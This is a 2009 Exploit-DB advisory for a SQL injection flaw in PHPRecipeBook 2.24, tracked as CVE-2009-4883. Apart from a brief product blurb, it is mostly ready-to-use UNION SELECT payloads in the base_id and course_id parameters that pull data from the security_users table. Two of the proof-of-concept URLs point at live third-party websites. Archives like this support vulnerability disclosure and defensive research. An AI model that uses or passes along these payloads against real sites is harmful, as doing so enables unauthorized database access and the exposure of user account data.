PHPRecipeBook 2.24 base_id Remote SQL Injection Vulnerability

2009-03-09T00:00:00
ID EDB-ID:8182
Type exploitdb
Reporter d3b4g
Modified 2009-03-09T00:00:00

Description

PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability. CVE-2009-4883. Webapps exploit for php platform

                                        
                                            [+] PHPRecipeBook 2.24 (_id)Remort SQL Injection Vulnerability
[-] 
[+] Discovered By d3b4g 
[+] script: http://phprecipebook.sourceforge.net/demo/phprecipebook/                 
[+] Greetz :  str0ke | Inerd | & friends
[-] Follow me on twitter www.twitter.com/schaba


About:
------>
PHPRecipeBook is a Web-based cookbook with the 
ability to create shopping lists from recipes selected.
The lists can be saved and later reloaded and edited. 
The shopping list also attempts to combine similar items
so that duplication does not occur. 



/* start

0x1 

Proof of concept 
-------------------------------------

Exploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

Demo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--


/* end

-------------------------------------
From Tiny Little island of Maldivies 
-------------------------------------

# milw0rm.com [2009-03-09]